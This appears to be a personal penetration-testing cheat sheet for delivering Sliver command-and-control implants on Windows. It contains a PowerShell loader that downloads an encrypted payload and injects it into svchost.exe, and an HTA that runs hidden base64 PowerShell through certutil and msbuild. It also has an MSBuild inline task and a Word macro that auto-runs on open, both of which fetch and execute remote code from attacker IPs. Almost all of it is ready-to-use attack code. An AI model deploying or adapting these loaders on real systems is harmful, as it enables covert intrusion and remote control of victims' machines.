cwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAADkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://192.168.45.157:8443/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
base64 -w 0 sliver.xml > sliver_base64.txt
Sliver HTA
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjAuMC4yNDIvYW1zaScpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo= > c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\d.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\d.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Sliver xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.0.0.241/am.txt') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Sliver VBA Macro
Sub MyMacro()
Dim str2 As String
str2 = "mshta.exe http://192.168.45.195/sliver.hta"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
When working with large1.ps1
- I used x.xml and then base64 encode it see client side execution with am_new.txt
- Keep changeing the output file names. if error occurs once
powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMTk1L2FtLnR4dCcpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo= > c:\\windows\\temp\\enc2.txt;certutil -decode c:\\windows\\temp\\enc2.txt c:\\windows\\temp\\f.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\f.xml